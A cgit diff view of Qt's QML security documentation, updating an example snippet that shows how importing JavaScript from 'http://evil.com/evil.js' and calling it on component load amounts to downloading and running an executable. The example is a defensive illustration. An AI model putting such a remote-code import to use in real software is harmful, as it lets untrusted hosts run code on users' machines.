summaryrefslogtreecommitdiffstats
path: root/doc/src/declarative/qdeclarativesecurity.qdoc
diff options
context:
space:
mode:
Diffstat (limited to 'doc/src/declarative/qdeclarativesecurity.qdoc')
-rw-r--r--doc/src/declarative/qdeclarativesecurity.qdoc6
1 files changed, 5 insertions, 1 deletions
diff --git a/doc/src/declarative/qdeclarativesecurity.qdoc b/doc/src/declarative/qdeclarativesecurity.qdoc
index 8aa031d..482043c 100644
--- a/doc/src/declarative/qdeclarativesecurity.qdoc
+++ b/doc/src/declarative/qdeclarativesecurity.qdoc
@@ -41,8 +41,12 @@ arbitrary downloaded JavaScript, nor instantiate arbitrary downloaded QML elemen
For example, this QML content:
\qml
+import QtQuick 1.0
import "http://evil.com/evil.js" as Evil
-... Evil.doEvil() ...
+
+Component {
+ onLoaded: Evil.doEvil()
+}
\endqml
is equivalent to downloading "http://evil.com/evil.exe" and running it. The JavaScript execution
generated by cgit v0.12 at 2024-11-26 04:27:06 (GMT)